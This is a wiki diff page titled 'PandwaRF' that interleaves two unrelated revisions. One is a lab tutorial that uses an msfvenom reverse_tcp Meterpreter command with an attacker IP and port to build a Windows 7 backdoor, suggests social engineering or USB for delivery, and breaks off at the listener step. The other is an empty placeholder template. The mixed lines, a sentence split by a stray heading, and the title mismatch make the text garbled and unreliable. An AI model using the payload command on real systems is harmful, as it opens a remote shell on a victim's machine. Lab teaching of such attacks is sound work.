Difference between revisions of "PandwaRF"

From Embedded Lab Vienna for IoT & Security
(BitcoinWallets)
(Changed template to default template)
Line 1: Line 1:
== Summary ==
== Summary ==  
This documentation describes how operating system backdoors can be created using the MSFvenom framework and what the attacker can do once he/she gains access to the victim machine. This particular attack takes advantage of the fact that the Windows 7 firewall by design only inspects the incoming traffic while the outgoing traffic is pretty much ignored. With this in mind one can create a reverse TCP payload, open a particular port and let the victim connect to that open port.  
 
== Introduction ==
Description what this documentation is about.
MSFvenom is an easily manageable framework t
 
== Headline text ==
hat can be used to quickly create Metasploit payloads.
== Requirements ==
== Requirements ==
Devices: 2 devices --> 1 running Kali Linux (attacker) and 1 running Windows 7 (victim)


== Exploit ==
* Operating system: Ubuntu 18.04 bionic amd64
1. On Kali Linux we will open up a new shell and create a reverse TCP payload with the help of MSFvenom in one single line:
* Packages: git emacs
'''msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.134 LPORT=6565 -f exe -o backdoor.exe.'''
 
With '''-p''' we specify which type of payload we want to create, '''LHOST''' and '''LPORT''' are basically the IP address and the port that we will open for our victim to connect to. '''-f exe''' specifies that the created payload is an executable file and '''-o''' specifies the name under which the file should be saved.
In order to complete these steps, you must have followed [[Some Other Documentation]] before.
 
== Description ==


2. The next step is the hardest challenge and that would be to transfer the backdoor to the victim machine. This can be done in many ways (most often it is done by different social engineering toolkits) but for the sake of simplicity, you can use a USB.
=== Step 1 ===


3. Before executing the backdoor file on the victim machine, we need to setup a listener that will listen for connections on a particular port. We will use metasploit to create the listener just like on the photo.
Enter these commands in the shell
[[File:1.png]]


echo foo
echo bar


=== Step 2 ===
Make sure to read
* War and Peace
* Lord of the Rings
* The Baroque Cycle
== Used Hardware ==
[[Device to be used with this documentation]]
[[Maybe another device to be used with this documentation]]
== Courses ==
* [[A course where this documentation was used]] (2017, 2018)
* [[Another one]] (2018)


== References ==
== References ==
https://blog.attify.com/hack-iot-devices-embedded-exploitation/


https://blog.attify.com/hack-iot-device/
* https://wikipedia.org
* https://google.com
 
[[Category:Documentation]]
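
Review bot: the revision rendered below is the unfilled default template saved under the page title "PandwaRF". The Summary still reads "Description what this documentation is about.", Step 1 is "echo foo" / "echo bar", the Requirements defer to [[Some Other Documentation]], and the References are https://wikipedia.org and https://google.com. Replace these placeholders with content for this page before saving, or keep the previous text until that content exists. The other side of the diff describes MSFvenom backdoors on Windows 7 rather than PandwaRF, and its Introduction sentence is split by a stray "== Headline text ==" heading ("framework t" / "hat can be used"), so neither side documents the subject named in the title.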

Revision as of 21:53, 30 January 2022

Summary

Description what this documentation is about.

Requirements

  • Operating system: Ubuntu 18.04 bionic amd64
  • Packages: git emacs

In order to complete these steps, you must have followed Some Other Documentation before.

Description

Step 1

Enter these commands in the shell

echo foo
echo bar

Step 2

Make sure to read

  • War and Peace
  • Lord of the Rings
  • The Baroque Cycle

Used Hardware

Device to be used with this documentation

Maybe another device to be used with this documentation

Courses

References